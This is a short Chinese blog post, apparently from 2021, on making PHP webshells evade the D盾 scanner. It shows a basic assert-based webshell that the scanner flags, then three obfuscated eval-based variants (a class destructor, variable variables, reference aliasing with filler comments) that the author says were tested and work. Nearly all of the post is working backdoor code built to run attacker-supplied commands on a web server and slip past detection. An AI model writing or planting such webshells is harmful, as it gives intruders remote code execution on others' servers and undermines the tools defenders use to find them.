TypechoJoeTheme

mmzkyl

Webshell免杀_php

mmzkyl博主
2021-09-28
/
0 评论
/
232 阅读
/
89 个字
/
百度已收录
09/28
本文最后更新于2021年09月28日,已超过237天没有更新。如果文章内容或图片资源失效,请留言反馈,我会及时处理,谢谢!

随笔

  • 2021-09-27 18:33
    来试试webshell免杀,主要测试一下D盾
  • 2021-09-28 18:00
    昨天开了个头,跟室友玩游戏去了,今天继续
  • 2021-09-28 18:01
    下列的webshell我自己在PHP study上已经测试其均能够正常使用
  • 2021-09-28 18:18
    因为eval比assert更为通用,所以免杀的webshell我是用eval进行写的

原始webshell

 <?php
  assert($_POST['mmzkyl']);
 ?>


直接被D盾查出后门

免杀

  • webshell_1
    • 代码
      php <?php class C{ public $ruby = ""; public function p($x){ return $_POST[$x]; } function java($x){ return "/*acnaac*/".@eval($x); } function Go($x){ return $x; } function __destruct(){ $this->java($this->Go($this->ruby)); } } $a = new C; $a->ruby = $a->p('mmzkyl'); ?>
  • webshell_2
    • 代码
      php <?php $html = "css"; $css = "js"; $$$html = $_POST['mmzkyl']; "html".@eval("/*acbaocola*/".$js); ?>
  • webshell_3
    • 代码
      php <?php $html = "this is html"; $css = &$html; $css = $_POST['mmzkyl']; eval("/*html*/".$html."/*html*/"); ?>
赞(2)
评论 (0)

互动读者

  • xcondjj闲逛

    评论 1 次 | 文章 0 篇

  • Mobile Medical Imaging Services Market闲逛

    评论 1 次 | 文章 0 篇

  • moxfmgef闲逛

    评论 1 次 | 文章 0 篇

  • เว็บแท่งหวยออนไลน์闲逛

    评论 1 次 | 文章 0 篇

标签云